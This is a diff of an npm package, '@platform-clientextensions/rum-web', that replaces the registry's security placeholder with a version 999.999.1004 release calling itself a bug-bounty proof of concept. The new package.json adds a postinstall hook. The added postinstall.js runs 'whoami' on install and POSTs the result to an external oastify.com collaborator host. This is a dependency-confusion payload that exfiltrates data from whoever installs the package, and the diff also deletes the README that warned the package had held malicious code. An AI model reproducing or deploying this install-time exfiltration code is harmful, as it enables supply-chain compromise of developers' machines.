@platform-clientextensions/rum-web 0.0.1-security → 999.999.1004

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "@platform-clientextensions/rum-web",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "999.999.1004",
+  "description": "Proof of concept for bug bounty",
+  "main": "postinstall.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/postinstall.js

@@ -0,0 +1,43 @@
+const { exec } = require('child_process');
+const https = require('https');
+
+// Execute whoami command
+exec('whoami', (error, stdout, stderr) => {
+  if (error) {
+    console.error(`Error: ${error.message}`);
+    return;
+  }
+  
+  const result = stdout.trim();
+  console.log(`Command output: ${result}`);
+  
+  // Send result to Burp Collaborator
+  const data = JSON.stringify({ 
+    command: 'whoami',
+    output: result,
+    package: '@platform-clientextensions/rum-web',
+    version: '999.999.1003'
+  });
+  
+  const options = {
+    hostname: '5ntbk8arzwvsowmd7fa8u4s6sxyomff34.oastify.com',
+    port: 443,
+    path: '/',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': data.length
+    }
+  };
+  
+  const req = https.request(options, res => {
+    console.log(`Result sent to Burp Collaborator. Status: ${res.statusCode}`);
+  });
+  
+  req.on('error', error => {
+    console.error('Error sending to Burp:', error);
+  });
+  
+  req.write(data);
+  req.end();
+});

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40platform-clientextensions%2Frum-web for more information.